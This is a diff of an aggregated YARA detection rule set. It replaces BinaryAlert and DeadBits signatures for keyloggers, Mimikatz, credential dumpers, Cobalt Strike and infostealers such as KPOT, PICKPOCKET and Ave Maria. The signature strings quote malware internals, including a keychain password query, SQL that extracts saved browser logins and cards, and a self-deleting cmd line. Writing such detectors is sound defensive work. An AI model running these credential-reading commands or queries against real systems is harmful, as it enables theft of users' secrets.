+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/gentilkiwi/mimikatz"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_errors.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "45ca583c07b8593ed716306ae6f80eef1c3fc5652aed739454fa8007fae929b4"
+		logic_hash = "60fb94b9465b19af3b2df1b26490d4ac19a31a39f2f8c52f1059d37843769b36"
 		score = 75
 		quality = 80
 		tags = ""
+		md5_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
+		md5_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
 
 	strings:
-		$a1 = "ERROR: Unable to access keystroke log file. Please make sure you have the correct permissions." wide ascii
-		$a2 = "ERROR: Unable to create event tap." wide ascii
-		$a3 = "Keystrokes are now being recorded" wide ascii
+		$s1 = "[ERROR] [LSA] Symbols" fullword ascii wide
+		$s2 = "[ERROR] [CRYPTO] Acquire keys" fullword ascii wide
+		$s3 = "[ERROR] [CRYPTO] Symbols" fullword ascii wide
+		$s4 = "[ERROR] [CRYPTO] Init" fullword ascii wide
 
 	condition:
-		2 of ( $a* )
+		all of them
 }
-rule BINARYALERT_Hacktool_Macos_Manwhoami_Mmetokendecrypt
+rule BINARYALERT_Hacktool_Windows_Hot_Potato
 {
 	meta:
-		description = "This program decrypts / extracts all authorization tokens on macOS / OS X / OSX."
+		description = "No description has been set in the source file - BinaryAlert"
 		author = "@mimeframe"
-		id = "2dc01ff3-4c4a-548d-b2f0-b36897ad6a5c"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/manwhoami/MMeTokenDecrypt"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_mmetokendecrypt.yara#L1-L15"
+		id = "dee13640-b4a9-5a39-af01-338c0197c995"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/foxglovesec/Potato"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_hot_potato.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "ccfedfbff0c6eefe41e80fe488d4cae928a33e7b86019c6ec54d1c9005b35147"
+		logic_hash = "1ccee61660b3478294a5a4e1ca2b16c91156f6c877d0f83848cccd18a3f753f7"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "security find-generic-password -ws 'iCloud'" wide ascii
-		$a2 = "ERROR getting iCloud Decryption Key" wide ascii
-		$a3 = "Could not find MMeTokenFile. You can specify the file manually." wide ascii
-		$a4 = "Decrypting token plist ->" wide ascii
-		$a5 = "Successfully decrypted token plist!" wide ascii
+		$a1 = "Parsing initial NTLM auth..." wide ascii
+		$a2 = "Got PROPFIND for /test..." wide ascii
+		$a3 = "Starting NBNS spoofer..." wide ascii
+		$a4 = "Exhausting UDP source ports so DNS lookups will fail..." wide ascii
+		$a5 = "Usage: potato.exe -ip" wide ascii
 
 	condition:
-		3 of ( $a* )
+		any of ( $a* )
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_Roxlu_Ofxkeylogger
+rule BINARYALERT_Hacktool_Windows_Moyix_Creddump
 {
 	meta:
-		description = "ofxKeylogger keylogger."
+		description = "creddump is a python tool to extract credentials and secrets from Windows registry hives."
 		author = "@mimeframe"
-		id = "c0e00b76-9623-5709-b64b-0afe006eba60"
+		id = "46df781a-abab-5593-99f9-1a6b993904cb"
 		date = "2017-09-12"
 		modified = "2017-09-12"
-		reference = "https://github.com/roxlu/ofxKeylogger"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_roxlu_ofxkeylogger.yara#L1-L13"
+		reference = "https://github.com/moyix/creddump"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_moyix_creddump.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "6e2579a10327cc8f1799848b3bcbcd95733a31098faeb849df6ebf99f1ffe808"
+		logic_hash = "3f2f4c5069fcb3d3b1d293a471bcf9489f058f27cd385885ab2bb4f719a3bd9d"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "keylogger_init" wide ascii
-		$a2 = "install_keylogger_hook function not found in dll." wide ascii
-		$a3 = "keylogger_set_callback" wide ascii
+		$a1 = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%" wide ascii
+		$a2 = "0123456789012345678901234567890123456789" wide ascii
+		$a3 = "NTPASSWORD" wide ascii
+		$a4 = "LMPASSWORD" wide ascii
+		$a5 = "aad3b435b51404eeaad3b435b51404ee" wide ascii
+		$a6 = "31d6cfe0d16ae931b73c59d7e0c089c0" wide ascii
 
 	condition:
 		all of ( $a* )
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_Dannvix
+rule BINARYALERT_Hacktool_Windows_Rdp_Cmd_Delivery
 {
 	meta:
-		description = "A simple keylogger for macOS."
-		author = "@mimeframe"
-		id = "598d6dbc-540d-5f96-8bd1-c15e6194012e"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/dannvix/keylogger-osx"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_dannvix.yara#L1-L13"
+		description = "Delivers a text payload via RDP (rubber ducky)"
+		author = "@fusionrace"
+		id = "8d035721-34ee-566f-8851-1c9501de2704"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/nopernik/mytools/blob/master/rdp-cmd-delivery.sh"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_rdp_cmd_delivery.yara#L1-L14"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "95d0540b1308caf3e7287c70a759954650220192800c0154d225bcb01ed55766"
+		logic_hash = "98bc02bb651fba069828b5960ee47542828f0d530e5e280b15abb0573b8e0168"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "/var/log/keystroke.log" wide ascii
-		$a2 = "<forward-delete>" wide ascii
-		$a3 = "<unknown>" wide ascii
+		$s1 = "Usage: rdp-cmd-delivery.sh OPTIONS" ascii wide
+		$s2 = "[--tofile 'c:\\test.txt' local.ps1 #will copy contents of local.ps1 to c:\\test.txt" ascii wide
+		$s3 = "-cmdfile local.bat                #will execute everything from local.bat" ascii wide
+		$s4 = "To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console" ascii wide
 
 	condition:
-		all of ( $a* )
+		any of them
 }
-rule BINARYALERT_Hacktool_Macos_Manwhoami_Osxchromedecrypt
+rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Postexploitation : FILE
 {
 	meta:
-		description = "Decrypt Google Chrome / Chromium passwords and credit cards on macOS / OS X."
-		author = "@mimeframe"
-		id = "874cc999-d9c2-5017-83ec-e4be8a659476"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/manwhoami/OSXChromeDecrypt"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_osxchromedecrypt.yara#L1-L16"
+		description = "Detection of strings in the post-exploitation modules of Cobalt Strike"
+		author = "@javutin, @mimeframe"
+		id = "76c2a5ae-bc7c-50c7-8731-94c75912574f"
+		date = "2017-12-14"
+		modified = "2017-12-14"
+		reference = "https://www.cobaltstrike.com/support"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_postexploitation.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "0974c6a5e7875e20380df0f58bf22a589b9a5c718e635ec77b42060abcf99473"
+		logic_hash = "1a89128a0f5774d1333be440d38128e29cb36f9818fa44e60482ef078078aca8"
+		score = 75
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$s1 = "\\devcenter\\aggressor\\external\\"
+
+	condition:
+		filesize > 10KB and filesize < 1000KB and all of ( $s* )
+}
+rule BINARYALERT_Hacktool_Windows_Mimikatz_Copywrite
+{
+	meta:
+		description = "Mimikatz credential dump tool: Author copywrite"
+		author = "@fusionrace"
+		id = "bf7a52b5-c0af-5805-a2da-41ae3842e0c6"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/gentilkiwi/mimikatz"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_copywrite.yara#L1-L24"
+		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
+		logic_hash = "f0e8a8b0c7398e7af06bd074eec0433265ba0e675bdbff354e59432c246b0b36"
 		score = 75
 		quality = 80
 		tags = ""
+		md5_1 = "0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8"
+		md5_2 = "0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b"
+		md5_3 = "0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143"
+		md5_4 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
+		md5_5 = "09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca"
+		md5_6 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
 
 	strings:
-		$a1 = "Credit Cards for Chrome Profile" wide ascii
-		$a2 = "Passwords for Chrome Profile" wide ascii
-		$a3 = "Unknown Card Issuer" wide ascii
-		$a4 = "ERROR getting Chrome Safe Storage Key" wide ascii
-		$b1 = "select name_on_card, card_number_encrypted, expiration_month, expiration_year from credit_cards" wide ascii
-		$b2 = "select username_value, password_value, origin_url, submit_element from logins" wide ascii
+		$s1 = "Kiwi en C" fullword ascii wide
+		$s2 = "Benjamin DELPY `gentilkiwi`" fullword ascii wide
+		$s3 = "http://blog.gentilkiwi.com/mimikatz" fullword ascii wide
+		$s4 = "Build with love for POC only" fullword ascii wide
+		$s5 = "gentilkiwi (Benjamin DELPY)" fullword wide
+		$s6 = "KiwiSSP" fullword wide
+		$s7 = "Kiwi Security Support Provider" fullword wide
+		$s8 = "kiwi flavor !" fullword wide
 
 	condition:
-		3 of ( $a* ) or all of ( $b* )
+		any of them
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_Caseyscarborough
+rule BINARYALERT_Hacktool_Windows_Mimikatz_Files
 {
 	meta:
-		description = "A simple and easy to use keylogger for macOS."
-		author = "@mimeframe"
-		id = "82d9ff7e-b475-5888-82e1-f65c286a9cde"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/caseyscarborough/keylogger"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_caseyscarborough.yara#L1-L14"
+		description = "Mimikatz credential dump tool: Files"
+		author = "@fusionrace"
+		id = "ea4fd443-64dd-5466-8525-40c3a023e229"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/gentilkiwi/mimikatz"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_files.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "d97fbfefe027a26ec998743b811734e62423e8a5ba4e11d516dcfc9e4831d296"
+		logic_hash = "50d23cda49ca559da2e504e53b46b58679ea8bc07c501ff7764a3d142598adc8"
 		score = 75
 		quality = 80
 		tags = ""
+		md5_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
+		md5_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
 
 	strings:
-		$a1 = "/var/log/keystroke.log" wide ascii
-		$a2 = "ERROR: Unable to create event tap." wide ascii
-		$a3 = "Keylogging has begun." wide ascii
-		$a4 = "ERROR: Unable to open log file. Ensure that you have the proper permissions." wide ascii
+		$s1 = "kiwifilter.log" fullword wide
+		$s2 = "kiwissp.log" fullword wide
+		$s3 = "mimilib.dll" fullword ascii wide
 
 	condition:
-		2 of ( $a* )
+		any of them
 }
-rule BINARYALERT_Hacktool_Macos_Manwhoami_Icloudcontacts
+rule BINARYALERT_Hacktool_Windows_Mimikatz_Sekurlsa
 {
 	meta:
-		description = "Pulls iCloud Contacts for an account. No dependencies. No user notification."
-		author = "@mimeframe"
-		id = "b6595540-7f89-5764-b34e-d32c1a377b6c"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/manwhoami/iCloudContacts"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_icloudcontacts.yara#L1-L14"
+		description = "Mimikatz credential dump tool"
+		author = "@fusionrace"
+		id = "08fe62c5-f7a4-5985-a298-1d3c2c1744d4"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/gentilkiwi/mimikatz"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_sekurlsa.yara#L1-L18"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "0c5b81454b26de91f5ad126b24f10397e1da5d8561b0bf22c5df128753df0ac2"
+		logic_hash = "24e958c3cbda8e01dc2d84b3059114ea23f4b38db1676f7b72e5eabfa52b7335"
 		score = 75
 		quality = 80
 		tags = ""
+		SHA256_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
+		SHA256_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
 
 	strings:
-		$a1 = "https://setup.icloud.com/setup/authenticate/" wide ascii
-		$a2 = "https://p04-contacts.icloud.com/" wide ascii
-		$a3 = "HTTP Error 401: Unauthorized. Are you sure the credentials are correct?" wide ascii
-		$a4 = "HTTP Error 404: URL not found. Did you enter a username?" wide ascii
+		$s1 = "dpapisrv!g_MasterKeyCacheList" fullword ascii wide
+		$s2 = "lsasrv!g_MasterKeyCacheList" fullword ascii wide
+		$s3 = "!SspCredentialList" ascii wide
+		$s4 = "livessp!LiveGlobalLogonSessionList" fullword ascii wide
+		$s5 = "wdigest!l_LogSessList" fullword ascii wide
+		$s6 = "tspkg!TSGlobalCredTable" fullword ascii wide
 
 	condition:
-		3 of ( $a* )
+		all of them
 }
 /*
  * YARA Rule Set
  * Repository Name: DeadBits
  * Repository: https://github.com/deadbits/yara-rules/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: d002f7ecee23e09142a3ac3e79c84f71dda3f001
  * Number of Rules: 19
  * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance)
@@ -69316,6 +69263,80 @@ rule BINARYALERT_Hacktool_Macos_Manwhoami_Icloudcontacts
  *
  * NO LICENSE SET
  */
+rule DEADBITS_KPOT_V2 : WINMALWARE INFOSTEALER FILE
+{
+	meta:
+		description = "No description has been set in the source file - DeadBits"
+		author = "Adam Swanda"
+		id = "19e8d261-c658-5d0d-a95c-43fcaf2942e2"
+		date = "2019-08-05"
+		modified = "2019-08-05"
+		reference = "https://github.com/deadbits/yara-rules"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/KPOT_v2.yara#L1-L33"
+		license_url = "N/A"
+		logic_hash = "dc8cce2ae3a427f771b19b4d0e027b653ff03a7bf816303460398987535c5351"
+		score = 75
+		quality = 80
+		tags = "WINMALWARE, INFOSTEALER, FILE"
+		Description = "Attempts to detect KPOT version 2 payloads"
+		Author = "Adam M. Swanda"
+
+	strings:
+		$str01 = "%s: " ascii fullword
+		$str02 = " _%s_" ascii fullword
+		$str03 = "0|%S|%s|%s|%s" ascii fullword
+		$str04 = "%s | %02d/%04d | %s | %s | %s" ascii fullword
+		$str05 = "%s | %s | %s | %s | %s | %s | %s | %d | %s" ascii fullword
+		$str06 = "%s: %s | %02d/%04d | %s" ascii fullword
+		$str07 = "%s = %s" ascii fullword
+		$str08 = "password-check" ascii fullword
+		$conf_re1 = /(SMTP|POP3|IMAP)\sServer/ wide
+		$conf_re2 = /(SMTP|POP3|IMAP)\s(User|Password|Port)/ wide
+		$conf01 = "*.config" ascii wide fullword
+		$conf02 = "HTTP Server URL" ascii wide fullword
+		$conf03 = "%s: %d" ascii wide fullword
+		$conf04 = "%s\\Outlook.txt" ascii wide fullword
+
+	condition:
+		uint16( 0 ) == 0x5a4d and all of ( $str* ) and all of ( $conf_re* ) and all of ( $conf0* )
+}
+rule DEADBITS_APT34_PICKPOCKET : APT APT34 INFOSTEALER WINMALWARE FILE
+{
+	meta:
+		description = "Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018"
+		author = "Adam Swanda"
+		id = "71db5c74-4964-5c5e-a830-242bfd0a2158"
+		date = "2019-07-22"
+		modified = "2019-07-22"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT34_PICKPOCKET.yara#L1-L30"
+		license_url = "N/A"
+		logic_hash = "7063cff3eb42c4468e01c9b214161cd306f7126f66650d99d43168730d1dc83a"
+		score = 75
+		quality = 80
+		tags = "APT, APT34, INFOSTEALER, WINMALWARE, FILE"
+
+	strings:
+		$s1 = "SELECT * FROM moz_logins;" ascii fullword
+		$s2 = "\\nss3.dll" ascii fullword
+		$s3 = "SELECT * FROM logins;" ascii fullword
+		$s4 = "| %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');" ascii fullword
+		$s5 = "\\Login Data" ascii fullword
+		$s6 = "%s\\Mozilla\\Firefox\\profiles.ini" ascii fullword
+		$s7 = "Login Data" ascii fullword
+		$s8 = "encryptedUsernamencryptedPasswor" ascii fullword
+		$s10 = "%s\\Mozilla\\Firefox\\%s" ascii fullword
+		$s11 = "encryptedUsername" ascii fullword
+		$s12 = "2013-12-06 14:53:30 27392118af4c38c5203a04b8013e1afdb1cebd0d" ascii fullword
+		$s13 = "27392118af4c38c5203a04b8013e1afdb1cebd0d" ascii
+		$s15 = "= 'table' AND name!='sqlite_sequence'   AND coalesce(rootpage,1)>0" ascii fullword
+		$s18 = "[*] FireFox :" fullword wide
+		$s19 = "[*] Chrome :" fullword wide
+		$s20 = "username_value" ascii fullword
+
+	condition:
+		uint16( 0 ) == 0x5a4d and ( 8 of them or all of them )
+}
 rule DEADBITS_Winnti_Linux : LINUXMALWARE FILE
 {
 	meta:
@@ -69360,47 +69381,163 @@ rule DEADBITS_Winnti_Linux : LINUXMALWARE FILE
 	condition:
 		uint16( 0 ) == 0x457f and 8 of them
 }
-rule DEADBITS_Redghost_Linux : POSTEXPLOITATION LINUXMALWARE
+rule DEADBITS_Avemaria_Warzone : AVEMARIA WARZONE WINMALWARE INFOSTEALER FILE
 {
 	meta:
 		description = "No description has been set in the source file - DeadBits"
 		author = "Adam Swanda"
-		id = "f598e115-f821-5932-aa14-5254bf28092c"
-		date = "2019-08-07"
+		id = "1e03927b-d59c-5e1f-bdee-e44dfb172fad"
+		date = "2019-07-18"
 		modified = "2019-08-08"
-		reference = "https://github.com/d4rk007/RedGhost/"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/RedGhost_Linux.yara#L1-L45"
+		reference = "https://github.com/deadbits/yara-rules"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/avemaria_warzone.yara#L1-L32"
 		license_url = "N/A"
-		logic_hash = "0b12a0eda0a3b65c3da787770afb010eb5cd36426d41c04aca862ae1b01ab770"
+		logic_hash = "1fe55fc8ea80616b11757193c2c74b9cf577ab661ddca4c6c64cfad63a300614"
 		score = 75
 		quality = 80
-		tags = "POSTEXPLOITATION, LINUXMALWARE"
+		tags = "AVEMARIA, WARZONE, WINMALWARE, INFOSTEALER, FILE"
 		Author = "Adam M. Swanda"
 
 	strings:
-		$name = "[ R E D G H O S T - P O S T  E X P L O I T - T O O L]" ascii
-		$feature0 = "Payloads" ascii
-		$feature1 = "SudoInject" ascii
-		$feature2 = "lsInject" ascii
-		$feature3 = "Crontab" ascii
-		$feature4 = "GetRoot" ascii
-		$feature5 = "Clearlogs" ascii
-		$feature6 = "MassinfoGrab" ascii
-		$feature7 = "CheckVM" ascii
-		$feature8 = "MemoryExec" ascii
-		$feature9 = "BanIP" ascii
-		$func0 = "checkVM(){" ascii
-		$func1 = "memoryexec(){" ascii
-		$func2 = "banip(){" ascii
-		$func3 = "linprivesc(){" ascii
-		$func4 = "dirty(){" ascii
-		$func5 = "Ocr(){" ascii
-		$func6 = "clearlog(){" ascii
-		$func7 = "conmethods(){" ascii
-		$func8 = "add2sys(){" ascii
+		$str1 = "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q " ascii fullword
+		$str2 = "MsgBox.exe" wide fullword
+		$str4 = "\\System32\\cmd.exe" wide fullword
+		$str6 = "Ave_Maria" wide
+		$str7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" ascii fullword
+		$str8 = "SMTP Password" wide fullword
+		$str11 = "\\Google\\Chrome\\User Data\\Default\\Login Data" wide fullword
+		$str12 = "\\sqlmap.dll" wide fullword
+		$str14 = "SELECT * FROM logins" ascii fullword
+		$str16 = "Elevation:Administrator!new" wide
+		$str17 = "/n:%temp%" ascii wide
 
 	condition:
-		( uint16be( 0x0 ) == 0x2321 and for any i in ( 0 .. 64 ) : ( uint16be( i ) == 0x2f62 and uint8( i + 2 ) == 0x68 ) ) and ( $name or 5 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB ) and ( 5 of ( $str* ) or all of them )
+}
+rule DEADBITS_Silenttrinity_Delivery_Document : FILE
+{
+	meta:
+		description = "No description has been set in the source file - DeadBits"
+		author = "Adam Swanda"
+		id = "be8cf8b7-d7f8-587d-b7bd-ad10796cda7c"
+		date = "2019-07-19"
+		modified = "2019-07-19"
+		reference = "https://countercept.com/blog/hunting-for-silenttrinity/"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/SilentTrinity_Delivery.yara#L1-L30"
+		license_url = "N/A"
+		logic_hash = "1efaa317dd250fa127b134ff8e6e6ac48d1056059256f790925d2315a6865033"
+		score = 75
+		quality = 80
+		tags = "FILE"
+		Description = "Attempts to detect SilentTrinity delivery documents"
+		Author = "Adam M. Swanda"
+
+	strings:
+		$s0 = "VBE7.DLL" fullword ascii
+		$s1 = "TargetPivotTable" fullword ascii
+		$s2 = "DocumentUserPassword" fullword wide
+		$s3 = "DocumentOwnerPassword" fullword wide
+		$s4 = "Scripting.FileSystemObject" fullword wide
+		$s5 = "MSXML2.ServerXMLHTTP" fullword wide
+		$s6 = "Win32_ProcessStartup " fullword ascii
+		$s7 = "Step 3: Start looping through all worksheets" fullword ascii
+		$s8 = "Step 2: Start looping through all worksheets" fullword ascii
+		$s9 = "Stringer" fullword wide
+		$s10 = "-decode -f" fullword wide
+		$s11 = "2. Da biste pogledali dokument, molimo kliknite \"OMOGU" fullword wide
+
+	condition:
+		uint16( 0 ) == 0xcfd0 and filesize < 200KB and ( 8 of ( $s* ) or all of them )
+}
+rule DEADBITS_Godlua_Linux : LINUXMALWARE FILE
+{
+	meta:
+		description = "No description has been set in the source file - DeadBits"
+		author = "Adam Swanda"
+		id = "1a05c88a-8199-5c6d-9352-9ef60df40078"
+		date = "2019-07-18"
+		modified = "2019-07-22"
+		reference = "https://github.com/deadbits/yara-rules"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/godlua_linux.yara#L1-L57"
+		license_url = "N/A"
+		logic_hash = "70a8078f261648f050807e82009493e39fa32c0748576b3df76d8aaaa117103e"
+		score = 75
+		quality = 26
+		tags = "LINUXMALWARE, FILE"
+		Author = "Adam M. Swanda"
+
+	strings:
+		$tmp0 = "/tmp" ascii fullword
+		$tmp1 = "TMPDIR" ascii
+		$str1 = "\"description\": \"" ascii fullword
+		$str2 = "searchers" ascii fullword
+		$str3 = "/dev/misc/watchdog" ascii fullword
+		$str4 = "/dev/wdt" ascii fullword
+		$str5 = "/dev/misc/wdt"
+		$str6 = "lcurl.safe" ascii fullword
+		$str7 = "luachild" ascii fullword
+		$str8 = "cjson.safe" ascii fullword
+		$str9 = "HostUrl" ascii fullword
+		$str10 = "HostConnect" ascii fullword
+		$str11 = "LUABOX" ascii fullword
+		$str12 = "Infinity" ascii fullword
+		$str13 = "/bin/sh" ascii fullword
+		$str14 = /\.onion(\.)?/ ascii fullword
+		$str15 = "/etc/resolv.conf" ascii fullword
+		$str16 = "hosts:" ascii fullword
+		$resolvers = /([0-9]{1,3}\.){3}[0-9]{1,3}:53,([0-9]{1,3}\.){3}[0-9]{1,3},([0-9]{1,3}\.){3}[0-9]{1,3}:5353,([0-9]{1,3}\.){3}[0-9]{1,3}:443/ ascii
+		$identifier0 = "$LuaVersion: God " ascii
+		$identifier1 = /fbi\/d\.\/d.\/d/ ascii
+		$identifier2 = "Copyright (C) FBI Systems, 2012-2019, https://fbi.gov" fullword ascii
+		$identifier3 = "God 5.1"
+
+	condition:
+		uint16( 0 ) == 0x457f and ( all of them or ( any of ( $identifier* ) and $resolvers and any of ( $tmp* ) and 4 of ( $str* ) ) or ( any of ( $identifier* ) and any of ( $tmp* ) and 4 of ( $str* ) ) )
+}
+rule DEADBITS_APT34_LONGWATCH : APT34 WINMALWARE KEYLOGGER FILE
+{
+	meta:
+		description = "No description has been set in the source file - DeadBits"
+		author = "Adam Swanda"
+		id = "74a6a408-2f0e-567d-8968-c304d258df81"
+		date = "2019-07-22"
+		modified = "2019-07-22"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT34_LONGWATCH.yara#L1-L43"
+		license_url = "N/A"
+		logic_hash = "8f9ed228325800baea3a2874c71337709c04d93419d4d56821a791dbce6f4582"
+		score = 75
+		quality = 78
+		tags = "APT34, WINMALWARE, KEYLOGGER, FILE"
+		Description = "APT34 Keylogger"
+
+	strings:
+		$log = "c:\\windows\\temp\\log.txt" ascii fullword
+		$clipboard = "---------------CLIPBOARD------------" ascii fullword
+		$func0 = "\"Main Invoked.\"" ascii fullword
+		$func1 = "\"Main Returned.\"" ascii fullword
+		$logger3 = ">---------------------------------------------------" ascii fullword
+		$logger4 = "[ENTER]" ascii fullword
+		$logger5 = "[CapsLock]" ascii fullword
+		$logger6 = "[CRTL]" ascii fullword
+		$logger7 = "[PAGE_UP]" ascii fullword
+		$logger8 = "[PAGE_DOWN]" ascii fullword
+		$logger9 = "[HOME]" ascii fullword
+		$logger10 = "[LEFT]" ascii fullword
+		$logger11 = "[RIGHT]" ascii fullword
+		$logger12 = "[DOWN]" ascii fullword
+		$logger13 = "[PRINT]" ascii fullword
+		$logger14 = "[PRINT SCREEN]" ascii fullword
+		$logger15 = "[INSERT]" ascii fullword
+		$logger16 = "[SLEEP]" ascii fullword
+		$logger17 = "[PAUSE]" ascii fullword
+		$logger18 = "[TAB]" ascii fullword
+		$logger19 = "[ESC]" ascii fullword
+		$logger20 = "[DEL]" ascii fullword
+		$logger21 = "[ALT]" ascii fullword
+
+	condition:
+		uint16( 0 ) == 0x5a4d and $log and all of ( $func* ) and all of ( $logger* ) and $clipboard
 }
 rule DEADBITS_TA505_Flowerpippi : TA505 FINANCIAL BACKDOOR WINMALWARE FILE
 {
@@ -69463,123 +69600,6 @@ rule DEADBITS_TA505_Flowerpippi : TA505 FINANCIAL BACKDOOR WINMALWARE FILE
 	condition:
